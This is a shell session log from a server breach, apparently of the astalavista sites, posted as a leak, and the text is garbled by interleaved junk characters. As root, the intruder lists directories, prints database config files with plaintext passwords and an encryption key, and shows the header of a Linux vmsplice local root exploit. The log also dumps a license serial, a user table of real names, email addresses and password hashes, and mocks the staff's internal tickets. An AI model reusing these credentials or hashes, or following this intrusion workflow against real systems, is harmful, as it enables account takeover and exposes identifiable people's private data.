drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains
+ C( j* E, F5 e( K7 O* ?5 hdrwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap* I9 w4 q4 _# P8 G, N- ^/ a
drwx——  2 astanet astanet 4096 Dec 23 12:18 mail
& B6 M/ Y5 J$ m$ H3 ~-rw——-  1 astanet astanet  197 Jun  4 09:51 .mysql_history
( i7 c% a0 L: S! klrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
0 ~  d) k4 V$ A$ U) K/ R  |; V-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow
4 S  L* \- t( m1 B+ a  u
8 ?+ u* |8 f3 K; u, U/ Ssh-3.2# cd auth/0 |6 i6 C+ `! k- D! F( }9 n
sh-3.2# ls -la  i7 L5 c) s$ `5 L# F
total 28
; c. y$ O& ^) @- X2 ^drwxr-xr-x 2 root    root    4096 Dec 23 16:00 .
/ g4 P% a1 D3 W6 r+ s: ~$ O/ p9 \drwx–x–x 6 astanet astanet 4096 Jun  4 09:51 ..7 c! g# z5 E6 }# i
-rw-r–r– 1 root    root     321 Jan  5  2006 hackercontest.config.inc.php  H9 t& F7 t  z( {2 h0 Z
-rw-r–r– 1 root    root     319 Jan  5  2006 hosting.config.inc.php- y; R" g' V' q7 P& ^  @- O9 p9 }
-rw-r–r– 1 root    root      24 Jun  4 09:38 .htadm_pwd
  q/ L7 N- Y% [0 {; X6 }9 \-rw-r–r– 1 root    root      49 Jan  5  2006 .htpasswd_newhosting$ s+ P* t% T+ F; X
-rw-r–r– 1 root    root      51 Oct 11  2006 .htwebalizer_pwd& V# d) M4 Q6 {) k2 O' Z% a
" }" D! X2 c) r/ u' g
sh-3.2# cat hackercontest.config.inc.php% A6 j9 z/ o- q0 Q7 R5 [0 w
<?PHP! T! q, A, W) g4 E; e! z
// Variabeln f?r Verbindung zur Datenbank //3 d8 N- E% P  x; Y( y* S
$conxHost = ‘localhost’;                       // MySQL hostname
2 U  ]" Z4 Z% T/ a( ]5 e$ d$conxUser = ‘hackercontest’;                                       // MySQL user- r% S  N/ l0 V) \1 i, U8 T
$conxPassword = ‘K6m@7dUc’;                    // MySQL password
: q5 ~* Z# s9 M+ v0 j$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish% a+ Q; s$ ]* Y4 s/ O
?>
3 c' h/ J9 S% N8 A1 wsh-3.2# cat hosting.config.inc.php4 r6 i! P  N& J4 e1 F
<?PHP# g2 L0 q* `# U
// Variabeln f?r Verbindung zur Datenbank //+ f/ D0 D6 s" t) c; j; y
$conxHost = ‘localhost’;                       // MySQL hostname
2 U/ V- w/ I- r+ V$conxUser = ‘hostinguser’;                                 // MySQL user
9 r' S- k$ ~$ _, [$conxPassword = ‘cXvB3981′;                    // MySQL password
$ j& T' T) C- y- Q5 ]4 B$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish" v) e4 R* B3 {$ v4 I
?>& ]% D$ Y$ h; p' v3 a
# F, N( O" ?* S' _, a& W
sh-3.2# cd ..) Z. z5 A/ ]2 q
sh-3.2# cd com+ t* E% G6 \& M, u" ~* z
sh-3.2# ls -la6 z: S7 \( C' x8 p9 K& T  i
total 1412085 n% E& G- T- l  ^$ l. Y
drwx–x–x 10 com  com       4096 Apr 28 12:40 .
% _( o! P6 g" J7 I, qdrwxr-xr-x 14 root root      4096 Mar 11 17:56 ..& c( r9 K1 B8 {7 m
drwx——  2 com  com       4096 Jun  4 04:04 backups+ I% Z6 T% T) Y: \9 `
-rw-r–r–  1 root root   2419504 Sep 28  2007 backup.sql
- b& B( ?2 B5 B. Vdrwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system+ i7 {3 |( C1 N: g. X! y3 O
-rw——-  1 com  com      21880 Jun  2 08:07 .bash_history; k- r" ~; d1 i. D! Q
-rw-r–r–  1 com  com         24 Sep 24  2007 .bash_logout
$ f0 H$ I" z1 M4 C9 n-rw-r–r–  1 com  com        176 Sep 24  2007 .bash_profile. o# I3 i( N: Q0 R; t; E
-rw-r–r–  1 com  com        124 Sep 24  2007 .bashrc' r- L: s8 @- @9 I6 Q( ?% v0 m
drwx–x–x  3 com  com       4096 Jan 29  2008 domains
) y' l# s/ w3 m8 \-rw-r–r–  1 com  com      16409 Jul 16  2008 FWUser.class.php.fixed
$ e1 h) h/ P1 ^4 G$ ^drwxrwx—  3 com  mail      4096 Jan  6 19:24 imap
+ f( \: }. J) v' ~/ i* x-rw——-  1 com  com         69 Nov 18  2008 .lesshst
, o( D2 E* |3 y! @& B/ a- edrwx——  2 com  com       4096 Sep 24  2007 mail- ~9 T* x1 t& j4 B# F
-rw——-  1 com  com      13970 Mar 28 21:42 .mysql_history6 |% X4 V3 `5 C2 @1 F
drwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp8 l# X! [( p0 }, Q' ?2 v
lrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html -> ./domains/astalavista.com/public_html
+ C+ |+ m6 t) e0 n7 W9 `-rw-r—–  1 com  mail        34 Sep 24  2007 .shadow
5 K0 u0 u4 J4 b2 }! G% ~, vdrwx——  2 com  com       4096 Aug 26  2008 .ssh
+ Y& g2 z+ w( g. [$ n7 F9 ^-rwx——  1 com  com       8515 Feb 10  2008 t' m0 p, B! L4 p: X4 M
-rw-rw-r–  1 com  com       6265 Feb 11  2008 t.c
7 g5 K9 T# f* o5 K' w5 fdrwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp
; Z; x. g( T7 L' C1 [  N-rw-rw-r–  1 com  com        617 May 20  2008 .toprc
' ]" x: A  ^2 V2 r-rw-rw-r–  1 com  com  141851766 May 19  2008 version2-backup-20080519-0900.sql
7 c. S5 Q: ?0 C9 a( M! A! x6 x-rw——-  1 com  com      16629 Mar 28 21:46 .viminfo
2 \# h! Q% p1 M: v-rw-rw-r–  1 com  com         51 Aug 25  2008 .vimrc
) T! i( [' q0 K0 h! E4 L% Y) [, A9 Y# x$ `' k* f
sh-3.2# head t.c8 s& B3 h" T) V: L( w' ^
/*& ?; e, I4 v9 x/ }2 S; I1 h5 ]  e
* jessica_biel_naked_in_my_bed.c( ?: {, l1 [+ ~$ K
*4 ~; X( _9 {  H0 y9 x+ \
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura." o4 v/ m9 l8 D
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
1 E& s* s. r" V2 w* Stejnak je to stare jak cyp a aj jakesyk rozbite.+ I  `0 u% J+ v; q
*+ G1 k) ]/ e# I# F4 Z" N' q: E
* Linux vmsplice Local Root Exploit9 Q: F2 ]# ~. Q! b8 _
* By qaaz% |5 G; f' A; y' t% F
*+ t6 o8 @0 C7 y. _) M6 X0 p
/ K% U) h, K/ Q9 ]  T
sh-3.2# cd /
0 B0 u1 c5 l0 ]sh-3.2# ls -la
( U# h5 D2 t& t/ u9 G% Utotal 360/ Y2 N; E4 D5 e- a
drwxr-xr-x  25 root root   4096 Jun  3 02:43 .6 P( Q3 N! A# N: L. c1 F
drwxr-xr-x  25 root root   4096 Jun  3 02:43 ..5 f* d2 o5 X/ t& n3 l
-rw——-   1 root root  10240 Jun  3 02:39 aquota.group
" n3 Z3 j% Q  b# f- r! \-rw——-   1 root root  10240 Jun  3 02:39 aquota.user6 s( u0 h. g5 f9 H  e
-rw-r—–   1 root root    819 Jul 17  2008 astalavista.us.db
4 v0 {& j+ N0 w! S5 }& a-rw-r–r–   1 root root      0 Jun  3 02:43 .autofsck
0 t7 V4 [4 r9 K& P$ l9 F-rw-r–r–   1 root root      0 Sep 16  2007 .autorelabel" H. |7 `' J1 y
drwxr-xr-x   3 root root   4096 Dec 29  2007 backup" ^( u( p; E5 ^1 Z$ X" A
drwxr-xr-x   2 root root   4096 Jun  4 04:03 bin0 p2 l7 B8 G! }9 B& Q4 J
drwxr-xr-x   5 root root   4096 Jun  2 14:06 boot
/ ?/ W; {5 }! Q8 h7 f( wdrwxr-xr-x  11 root root   3620 Jun  3 02:43 dev# _, i+ k0 n% P
drwxr-xr-x  84 root root  12288 Jun  4 03:16 etc3 ]: I3 V4 ^( f# e& j, N; L  n2 J5 a
drwxr-xr-x  14 root root   4096 Mar 11 17:56 home
* h. Q! R" ]" t7 s+ ?/ k2 ?8 b1 H-rw-r–r–   1 root root  13387 Mar 20  2008 httpd.conf# e. ?) W8 Y8 z- F: J4 p& _1 N* G
drwxr-xr-x  11 root root   4096 Jun  4 04:02 lib! l% w( U; n4 J, r2 l: x
drwxr-xr-x   7 root root   4096 Jun  4 04:03 lib64/ O5 e: Z! W5 D7 U+ B2 A' }
drwx——   2 root root  16384 Sep 11  2007 lost+found
2 m- Y# b# n1 v+ u4 B$ N& tdrwxr-xr-x   2 root root   4096 Mar 11 17:56 media8 ~% h0 f9 i" b. g3 S) z
drwxr-xr-x   2 root root      0 Jun  3 02:43 misc+ m: j4 U9 K* p% u1 Q
drwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt8 i3 x( L4 j$ m" E! h3 |* ~' N" u
-rw-r–r–   1 root root   5859 Feb  3  2008 mrtg.cfg6 q* w8 ^7 c& }* W
drwxr-xr-x   2 root root      0 Jun  3 02:43 net
1 `; u: Y4 U# W8 r. Y/ }4 Vdrwxr-xr-x   3 root root   4096 Mar 11 17:56 opt
' i6 S& P, }* u2 ^9 E! ddr-xr-xr-x 264 root root      0 Jun  3 02:42 proc
% j7 {' p6 }4 v6 _drwxr-x—  15 root root   4096 Jun  4 08:40 root( S4 [, e# u  q: M) t
drwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin
9 k  Y* c- ]$ J# D7 i! tdrwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux
' j2 E/ X. r1 J" ?) ddrwxr-xr-x   2 root root   4096 Mar 11 17:56 srv
2 I# v/ n" ^% B5 [& h  w5 u& Vdrwxr-xr-x  11 root root      0 Jun  3 02:42 sys
/ f1 P, U/ L. a! Q. pdrwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp5 [( O( y0 d1 g' A( \1 ?
drwxr-xr-x  16 root root   4096 Jun  2 13:56 usr0 l. N6 Y! q7 `; F9 Y2 N- m% G
drwxr-xr-x  26 root root   4096 Jun  4 03:16 var
+ N, {& l8 g/ O$ W' I& p" C8 j9 b9 j# o0 u- |- v9 G5 O# N
sh-3.2# cd opt
4 p$ u% Y. `4 d8 j' _, fsh-3.2# ls -la
) ]# }% A& O# q: S9 dtotal 20! g$ O; z4 y1 u, L
drwxr-xr-x  3 root root 4096 Mar 11 17:56 .
0 ]( M( R6 W& v- tdrwxr-xr-x 25 root root 4096 Jun  3 02:43 ..  v$ Q4 A9 O0 @' p
drwxr-xr-x 15 root root 4096 Mar 20  2008 lsws
' T" e4 U# m- s, P9 {6 i6 C7 H% `" G5 o( L
sh-3.2# cd lsws/
/ P& Z' J* w  m) E2 m) |sh-3.2# ls -la- w" @6 f3 `8 X7 H0 a- }
total 108
( V. k! E+ i  P$ Ydrwxr-xr-x 15 root   root    4096 Mar 20  2008 .
' t. Q) K' F  W5 L8 f+ x% ]+ l' D5 ]drwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..
# q2 O$ ~  L. G  a" h4 ndrwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons
& {" K- }, s  Q% H4 F+ t7 B) {drwxr-xr-x 13 root   root    4096 May 29 15:10 admin
; a/ J2 n2 t% D" Adrwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate9 k, Z2 c: T6 D- N0 h
drwxr-xr-x  2 root   root    4096 May 29 15:10 bin5 K6 W; Y3 N# [. _0 ^
drwx——  4 apache apache  4096 Jun  3 02:43 conf$ g1 w) e* }6 _& U
drwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT- h+ ]2 @: z) Z0 I" d
drwxr-xr-x  2 root   root    4096 Sep 15  2008 docs
  E2 Q6 X1 G" y2 r6 hdrwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin
5 f% s. N* ]5 Rdrwxr-xr-x  2 root   root    4096 Sep 15  2008 lib6 X( |2 C; g/ R6 R
-rw-r–r–  1 root   root    6959 May 29 15:10 LICENSE# f% G# _& e4 l+ p# y2 ^: v9 ~0 ~
-rw-r–r–  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP$ Y: f. r# N* O" S7 `% @8 r" h
-rw-r–r–  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL& |* [7 _3 A6 N4 W6 j% u0 G
-rw-r–r–  1 root   root    3208 May 29 15:10 LICENSE.PHP( W' e( ]: }/ k& c( S8 r
drwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs( e. m, G/ g9 o. i
drwxr-xr-x  2 root   root    4096 Mar 20  2008 php
  N, _: ]# j( u$ K* Ndrwx——  2 apache apache  4096 Mar 20  2008 phpbuild) m9 i0 M0 ]7 u" `" Z9 k0 |& _
drwxr-xr-x  3 root   root    4096 Mar 20  2008 share+ t3 Q' ?" q" g. f5 E- r' X( H6 @8 y
-rw-r–r–  1 root   root       6 May 29 15:10 VERSION
$ v+ H" i- m# W! p5 |, S
) o+ q# s# o7 z9 C& Rsh-3.2# cd conf
) j' |9 |9 I9 ~  J! O4 ysh-3.2# ls -la
0 @: j. Q# W$ m/ p" K: E* Xtotal 48
8 O! t. f* a% B' ~drwx——  4 apache apache 4096 Jun  3 02:43 .
/ B: A$ [# B9 P, Mdrwxr-xr-x 15 root   root   4096 Mar 20  2008 .." \" E5 D5 G* [3 L3 U
drwx——  2 apache apache 4096 Mar 20  2008 cert1 t$ @  q0 B( s! M' `
-rw-r–r–  1 apache apache 6668 May 29 15:13 httpd_config.xml: L3 z4 U8 V! m- d3 [3 `
-rw——-  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak0 ^  G) C6 O& ]+ o) h: |
-rw-r–r–  1 root   apache    0 Jun  3 14:11 .last6 i0 u# a' D# H- e: G( t7 I$ }
-rw——-  1 apache apache  256 May 29 15:10 license.key& W0 b1 F* ?. @# v2 L& Q
-rw——-  1 apache apache  256 Mar 21  2008 license.key.old
7 B' B$ {! b7 i' a  ]-rw——-  1 apache apache 3320 Mar 20  2008 mime.properties
) w6 k* W$ ?  A2 X# q; d3 G' f-rw——-  1 apache apache   20 May 29 15:10 serial.no0 z/ M$ `- l+ b4 N
drwx——  2 apache apache 4096 Mar 20  2008 templates
( O* A2 _! a9 Q0 z: ]5 ?) Z/ g: Z- I
sh-3.2# cat serial.no
6 V, M+ t8 p/ o  w( `! oIbDl-oVsO-CKqL-wVRa
. h& \0 D' p# _( U2 x, ?& S3 n8 S: [5 b' g
sh-3.2# mysql
. ~( T3 @6 l9 T  b! DWelcome to the MySQL monitor.  Commands end with ; or \g.4 H* Y1 E+ k  X7 A" w2 H* U
Your MySQL connection id is 286844
, ?: O, G0 \0 l. VServer version: 5.0.45-community-log MySQL Community Edition (GPL)5 Q: E; U  F3 Q9 @

9 u+ ]4 J% B: [8 PType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
; Y- [# X1 g! Z" n  b4 B: U, L3 p) ^7 L4 i9 M3 r- f) e: l! |+ j
mysql> show databases;  e* d5 r7 T; A
+———————–+
& l/ p% Y. n  [* S| Database              |
- h; b2 a; F8 p4 H3 r' B/ p+———————–+; v/ E. G! d' ?" A
| information_schema    |
$ Z. S' p5 d5 l| astanet_ads           |
. U3 ^- z" z' c% w8 O) Y| astanet_mailing_lists |
: ]- s, }5 W1 `| astanet_mediawiki     |
/ z2 K* s; t/ Q3 a" k& q| astanet_membersystem  |
1 Z/ `5 ], a, G/ o6 e# a0 h, H' f| com_contrexx          |* E8 r3 C5 o( P/ B3 w5 J
| com_contrexx2         |
; _% i0 u  h4 }% R/ H| com_contrexx2_live    |: ]+ s* r, i" m1 a" B+ q9 L
| da_roundcube          |
0 E4 `: s/ M. c' ]6 R5 K& l) Y; C& p9 }; A| dolphin               |, z* N) b: d! K& }; U; y5 W
| ideapool              |
& o" g+ O% d) d1 j8 I1 M| mysql                 |
: j) |  R3 R- w| test                  |  c1 H3 `* G: \
| yourmaster            |  {! M0 S+ X; b: k+ V
+———————–+
7 x0 e, @/ J( P- }14 rows in set (0.00 sec)
# m% J; ~  o% G4 o6 X; X  X. f  [+ M. c6 ~* o
mysql> use ideapool; d/ W7 j" b5 g/ k) U1 R
Database changed! U$ k* t# q( z* `8 L% R2 ~
mysql> show tables;% l# b: L5 A) P. i
+———————————–+
, B* \8 M; r. B2 || Tables_in_ideapool                |
- Q- |2 ~  i/ p% l: [7 @* m+———————————–+
* o! b  y; [: H' r* j; H| eventum_columns_to_display        |4 G: }- V, N) p. [. Z
| eventum_custom_field              |
( V7 c8 P8 s* Q8 J5 O| eventum_custom_field_option       |
! [8 O5 Y  g- Y8 h- _0 q| eventum_custom_filter             |8 ^9 j  Z* K6 j7 ]9 N) m3 v
| eventum_customer_account_manager  |& F  F& s4 K4 G/ L3 E& C8 |( x
| eventum_customer_note             |. k9 D# D' F  ~' r2 O& |
| eventum_email_account             |
' n0 a4 F) U; X  G, o* Y" O| eventum_email_draft               |$ ]# Y2 n8 t/ o* `% R. k
| eventum_email_draft_recipient     |
' u4 _! ?6 x( O$ R* Y  ^| eventum_email_response            |+ j2 f1 W9 Y+ d
| eventum_faq                       |
5 R) c- q- k+ J9 {. `9 B+ f) U| eventum_faq_support_level         |& g" p% W1 C- E2 g( b
| eventum_group                     |2 @2 S8 c2 _$ B$ {9 P: r
| eventum_history_type              |
: |( J2 J2 I7 x| eventum_irc_notice                |+ c  m  v  A& A+ ^( ~" Z
| eventum_issue                     |
" C. s- S3 `) K7 C6 h/ I; T: j| eventum_issue_association         |
7 h7 g. C; b5 ?9 d| eventum_issue_attachment          |
$ f: y6 [# A+ t9 d$ o) B% H| eventum_issue_attachment_file     |
6 M. B* |2 `( h8 X3 c% `| eventum_issue_checkin             |
: S$ Q3 @% z, h( k  h, F| eventum_issue_custom_field        |) U* j- D0 t2 w
| eventum_issue_history             |
' H0 T. \/ B0 B; a- x. G  B| eventum_issue_quarantine          |
( m% Q$ h3 g: d  ]/ D9 u| eventum_issue_requirement         |: a; {6 p; Z/ v) @( k
| eventum_issue_user                |
; @/ o/ i; H7 M| eventum_issue_user_replier        |
' x" X  ?( M) q# s% ^3 }/ ~| eventum_link_filter               |
2 D8 r3 Y/ q- U+ l| eventum_mail_queue                |; p1 S+ {+ F; {3 [
| eventum_mail_queue_log            |
% t. @- a2 K, h| eventum_news                      |
, q; v! N: x3 J) {' n0 J| eventum_note                      |; m- t) k& X4 J) H
| eventum_phone_support             |' ~* I  y( y# v& i4 m
| eventum_project                   |
6 v+ Y5 z, L! Z: g| eventum_project_category          |
- n" Q0 V' `, {8 W+ @. F| eventum_project_custom_field      |
$ H( i% \4 n1 L, l| eventum_project_email_response    |
8 M4 A" y9 U0 o' P| eventum_project_field_display     |
0 M" c2 [( F' r( [4 }$ C; |/ t| eventum_project_group             |
  O# ?2 ]9 h" |5 X) b9 T9 K| eventum_project_link_filter       |% G, m/ f# m2 z4 z2 Y/ J, O) u8 _
| eventum_project_news              |
- ~: L3 r3 P  Z/ D, D5 v| eventum_project_phone_category    |# }* q2 E$ n* j9 [; b3 ]2 m
| eventum_project_priority          |& b! N; P: F2 d% _* {/ {, V& `1 t
| eventum_project_release           |# W. r6 D4 {& Y' N$ i3 R# }
| eventum_project_round_robin       |
# e! ]7 O, t9 A& |7 s% u| eventum_project_status            |
& _' V, y% O+ Y0 D3 l5 ?3 s5 n| eventum_project_status_date       |
0 ?  e: k0 x4 l4 w| eventum_project_user              |9 |3 ~( i1 k% ?
| eventum_reminder_action           |
+ q3 q% A' F/ ^" F  {2 @) ^; h( k| eventum_reminder_action_list      |
+ S! W0 w4 M  C. R: p| eventum_reminder_action_type      |9 {' o3 u+ m4 z6 |2 o* r8 D
| eventum_reminder_field            |
! c) z6 p4 R8 H& z| eventum_reminder_history          |
' `& V1 i3 D% V+ s7 v! M; L| eventum_reminder_level            |" k$ A1 [5 k1 f! c
| eventum_reminder_level_condition  |
) J+ \8 B0 W" `3 y' j| eventum_reminder_operator         |
1 S# A8 a: W" P$ V# T$ V| eventum_reminder_priority         |
% v6 b) L8 K* S! x  b) n8 M, c" ^| eventum_reminder_requirement      |
. G' i' P1 T4 e* \, b2 r8 j| eventum_reminder_triggered_action |' G: f% ~2 V. V. c
| eventum_resolution                |) w& j8 R  P; G0 c8 o- g
| eventum_round_robin_user          |9 d' i0 z. }0 `; f
| eventum_search_profile            |$ m) [7 w8 N9 B$ O% h
| eventum_status                    |3 O/ j5 @1 V2 F) |3 n4 {
| eventum_subscription              |6 f' x+ o6 H6 \' D: V8 A7 R
| eventum_subscription_type         |
( r5 Z( S7 Z$ m& `. A| eventum_support_email             |
, ]3 D' B% T" V8 I& A$ u* \| eventum_support_email_body        |. z" Q, _1 p7 |* Z
| eventum_time_tracking             |8 [5 K. Y3 q& h' ]8 M8 P, W5 _
| eventum_time_tracking_category    |
: D9 S. i( N  o, N, A( P| eventum_user                      |2 m. [9 ?) f7 v! p! k( w6 b+ C) C
+———————————–+8 ]0 o. u( L/ S2 {6 K# h/ i
69 rows in set (0.00 sec)) s2 R3 d$ c* q/ g

- Z+ g. w% q( ]! I0 n0 \mysql> describe eventum_user;
6 G9 K3 `* y% d2 Y# y+————————-+——————+——+—–+———————+—————-+& q( _  o+ |& n, ~, s' U
| Field                   | Type             | Null | Key | Default             | Extra          |- C/ K5 y* u: t  k; C+ ^& I
+————————-+——————+——+—–+———————+—————-+. B) B6 A7 [0 y& k& B6 ^2 ~8 \! Y
| usr_id                  | int(11) unsigned | NO   | PRI | NULL                | auto_increment |+ r! f( D" a; B, S2 t4 A2 z
| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL                |                |; i8 D+ L! d; I
| usr_customer_id         | int(11) unsigned | YES  |     | NULL                |                |2 u3 o% @  w5 b0 }. L+ e2 {
| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL                |                |
* Y0 S* f$ F" q* I- Z8 @5 g' f/ `| usr_created_date        | datetime         | NO   |     | 0000-00-00 00:00:00 |                |
1 O8 w- B5 k4 S- Z| usr_status              | varchar(8)       | NO   |     | active              |                |* @8 H2 n$ T& G/ g5 G5 e6 y' e
| usr_password            | varchar(32)      | NO   |     |                     |                |6 m1 R7 c: ~: e( ]% h# B2 [3 M
| usr_full_name           | varchar(255)     | NO   |     |                     |                |
4 R2 [! L: b. r# E6 G| usr_email               | varchar(255)     | NO   | UNI |                     |                |
( ~% N3 N1 [- V4 k) L. H) [6 [+ Q| usr_preferences         | longtext         | YES  |     | NULL                |                |' r% p+ l1 }: b2 t& U1 y: p; X# l
| usr_sms_email           | varchar(255)     | YES  |     | NULL                |                |
& m, I" @: @: {$ X, h' \8 q6 K' b| usr_clocked_in          | tinyint(1)       | YES  |     | 0                   |                |, h3 M# @: D$ ~2 A( J! m1 V$ J+ f
| usr_lang                | varchar(5)       | YES  |     | NULL                |                |( j- o0 {) p/ a# l2 a
+————————-+——————+——+—–+———————+—————-+/ {1 K0 j" T" H4 }
13 rows in set (0.00 sec)
3 F% _/ S* G8 ~1 n4 {# R+ Z, O- P) ~, e7 P  C, N; R( ]- P/ Y
mysql> select usr_full_name,usr_email,usr_password from eventum_user;7 O1 Y# ~! o4 T7 M, m( e3 [
+———————-+——————————-+———————————-+1 {+ T& y6 R8 a: i. M$ }) ^1 o
| usr_full_name        | usr_email                     | usr_password                     |: n) z0 U1 [5 m6 \! T' Z! V
+———————-+——————————-+———————————-+; E. Z2 M. Z! C
| system               | 链接标记system-account@example.com    | 14589714398751513457adf349173434 |# U, I/ i6 D- A! r6 ^" K9 ~
| Developer (Paulo)    | 链接标记paulo.santos@astalavista.ch   | 26a35a1cf8895c27fb37ef4cf149f7bb |
! {; R- l8 D6 B. B/ a| Be1er0ph0r           | 链接标记be1er0ph0r@gmx.de             | 229766dc0ca1fb67160a8782321dfdce |0 e' {: M/ A  Y/ j
| Admin                | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |* E2 J# @8 m0 h
| ADMIN                | 链接标记admin@astalavista.ch          | f6fdffe48c908deb0f4c3bd36c032e72 |( S- D8 J: ]8 ^/ c- l2 Y9 a
| USER                 | 链接标记user@astalavista.ch           | 5cc32e366c87c4cb49e4309b75f57d64 |
5 G& b1 E! i8 B6 l* y/ `| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com       | f7735ab119023a8abb2301e67f81cd67 |: O% d0 S* u; Y- Z) L
| Joao                 | 链接标记joao.pontes@astalavista.net   | f805c071d7c823b937448c54c047b9fd |
+ z; U: @7 @2 W3 ?| Pascal               | 链接标记pm@astalavista.ch             | e10adc3949ba59abbe56e057f20f883e |
& S$ o' @) _0 @5 d. n. K3 x| commander            | 链接标记commander@astalavista.com     | 932cd250918f881d41feb0b93883a926 |
2 K+ a) a4 L% y2 e: I6 E2 s| ishtus               | 链接标记ishtus@astalavista.com        | a587ffc88b3dbbba3fd2fe67af649ff0 |( t7 w0 r) Y% o3 E$ p5 |/ l
| sykadul              | 链接标记sykadul@astalavista.com       | 20224a2f3eeb57a13a10b4df543c128e |$ X4 C! {% ^, {' Y# X& T/ K! S
| Zach McElroy         | 链接标记admin@badfoo.net              | 33c5d4954da881814420f3ba39772644 |0 c; ?, o+ l% M0 K! ]) I# i
| usb                  | 链接标记usbenigma@hushmail.com        | b513f22c3db6932855ad732f5f8a10a2 |/ G+ x& S% d7 }$ Q, R7 ]
| cyph3r               | 链接标记cyph3r@astalavista.com        | 6e1e50017a945e874d52ec91f9ab2cee |
! z+ O- X2 f3 X& A. k+———————-+——————————-+———————————-+) d" }; o' u  T* N
15 rows in set (0.00 sec)! r; Q  m) T3 Q% l! F; [, }3 o

: S- Z: F. C& X5 ?# V2 j" Dmysql> select iss_description from eventum_issue where iss_id = 43;# I' j, F% C+ C' @. q. [! Y
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
0 ]* V  q& ~. f: h" \* w| iss_description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
' ^) ^6 r* R; }# \|; s# [2 X9 h1 P# X2 q
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
; j: o, \  [3 d| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be& U: O5 ~  D* w$ R* d8 a
connected for 90 mins… 120mins… so what i propose is something like:
0 }! H- S9 ~! A链接标记[url]http://www.surfthechannel.com/[/url]
6 c" ?  b+ P* b! K. Nsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
# U9 w9 M* p5 y3 z/ q  blike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
0 H$ a& P( _! D* O$ S/ Z8 f) vbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off9 I8 D' h8 I8 ^% t3 ?
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
1 S( W7 _& i' S* D6 Q5 s  R% g* B6 ]* i4 q
We could also put advertisement during play on the flash video player itself… extra $$…9 h5 n8 L- P) q* f, Z  F) _
6 q. k9 O2 }7 d3 R0 A% j
By sykadul |
+ L5 {7 X) O. p3 w+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
& s8 S) z1 L. G8 e1 row in set (0.00 sec)
  p* p& M# x& n. Y- |; F5 n8 S4 b- H/ T4 u
// Money and extra $$ is all they care about. remember that.8 N  k" \2 T1 r5 ?9 ?2 L
+ a1 [: @4 p4 R. t8 j
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;# t+ L& t) t6 H5 @) [' W
+————————+——————————————————————————————————————————————————————————————————————————————-+, S  H8 l9 c% P/ e* \5 q
| iss_summary            | iss_description                                                                                                                                                                                                                          
2 Q' z# A6 U* G4 x|/ n2 g7 I) m9 U+ C- j8 j; X
+————————+——————————————————————————————————————————————————————————————————————————————-+
; v- M8 t$ z* L% {  N. ?| Forum for REAL EXPERTS | Hello,
1 H9 \9 D  ~: X! @( S6 {* D5 }* v& }( G  F6 ?8 o
Ishtus and I,
8 O& G# W% T3 B2 t3 M+ L- A" T
' V* |$ z1 J8 l' B  N# }4 ECame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
' y8 U7 U2 |# r8 R: oONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..1 T- Q2 L  J& b) ^/ a+ f+ y8 I  Y, x

7 h- s+ S: Y( [One example a friend of mine from coresecurity.com!
/ W& {  j( B" v0 O( R8 H# [
8 F& V) f+ B- T5 n+ `We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
& l! O( `; _% Y% K' Y1 e
' ^6 l/ ?9 R- W: r|/ Z& _, j$ V0 J0 U4 X5 p6 q; b
+————————+——————————————————————————————————————————————————————————————————————————————+
# M5 [$ ^9 o! x% B. ]9 g& v1 row in set (0.00 sec). s. p3 ?5 T9 l+ Q" o' Y

3 j. d2 U9 G1 Y7 \, T// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
) o+ w2 x3 ~4 U9 @% J+ t" F. R2 V* t
$ z8 A" o0 p( _0 ?: kmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;% z3 Y) Q5 H7 r1 S, u! U
+——————+———————————————————————————————+9 \2 y7 Z  @- B1 y8 Q
